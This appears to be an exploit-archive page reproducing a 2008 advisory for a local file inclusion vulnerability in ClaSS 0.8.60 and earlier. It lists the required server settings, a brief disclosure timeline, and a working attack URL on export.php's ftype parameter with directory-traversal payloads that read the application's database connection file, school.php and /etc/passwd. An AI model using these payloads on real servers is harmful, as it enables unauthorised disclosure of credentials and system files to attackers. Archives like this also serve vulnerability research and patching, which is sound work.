[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability
# Published : 2008-12-24
# Author : fuzion
# Previous Title : PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit
# Next Title : BloofoxCMS 0.3.4 (lang) Local File Inclusion Vulnerability


ClaSS
http://www.laex.org/class/


- <=0.8.60 -
magic_quotes_gpc = Off
register_globals = On


- File Disclosure/Download -
http://site/Class/class/scripts/export.php?ftype=
/../../path/to/Class/school.php
/../../path/to/Class/dbh_connect.php
/../../etc/passwd


- Timeline -
Author notified: Dec 19
Patch 0.8.61: Dec 19


- Seasons Greetings -
- http://nukeit.org -

# www.Syue.com [2008-12-24]